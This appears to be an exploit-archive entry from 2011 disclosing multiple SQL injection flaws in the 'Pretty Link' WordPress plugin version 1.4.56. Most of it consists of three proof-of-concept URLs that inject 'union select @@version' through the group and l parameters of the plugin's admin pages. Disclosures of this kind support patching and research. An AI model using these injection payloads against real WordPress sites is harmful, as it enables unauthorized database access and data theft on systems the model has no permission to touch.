'Pretty Link Like' WordPress Plugin 1.4.56 Multiple SQL Injection



EKU-ID: 646 CVE: OSVDB-ID:
Author: MaKyOtOx Published: 2011-06-28 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: 'Pretty Link Like' WordPress Plugin 1.4.56 Multiple SQL
Injection
# Google Dork: N/A
# Author: MaKyOtOx (special Pwet to ansx & Zizounette for #bitcoin)
# Date: 27/06/2011
# Software Link: http://wordpress.org/extend/plugins/pretty-link/
# Version: 1.4.56 (not tested on previous versions)
# Tested on: WhatEver OS
# CVE : 0-Day


PoC 1 :
http://wpsite.com/wp-admin/admin.php?page=pretty-link/prli-clicks.php&group=-1union
select @@version
PoC 2 :
http://wpsite.com/wp-admin/admin.php?page=pretty-link/prli-clicks.php&l=-1union
select @@version
PoC 3 :
http://wpsite.com/wp-admin/admin.php?page=pretty-link/prli-links.php&group=-1union
select @@version